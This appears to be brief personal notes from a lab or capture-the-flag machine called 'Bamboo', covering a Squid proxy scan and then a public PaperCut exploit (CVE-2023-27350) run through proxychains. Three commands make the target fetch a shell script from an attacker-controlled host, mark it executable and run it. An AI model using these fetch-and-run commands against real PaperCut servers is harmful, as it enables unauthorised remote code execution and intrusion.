Bamboo

Post 22 Port 3189 -- Squid

go mod tidy
go build
./squidscan

Now we found a papercut exploit on github: https://github.com/horizon3ai/CVE-2023-27350/tree/main

Using this:

proxychains python3 CVE-2023-27350.py -u http://10.10.82.145:9191 -c 'wget http://10.8.1.208/shell.sh' 

proxychains python3 CVE-2023-27350.py -u http://10.10.82.145:9191 -c 'chmod +x shell.sh'

proxychains python3 CVE-2023-27350.py -u http://10.10.82.145:9191 -c './shell.sh' 

Last updated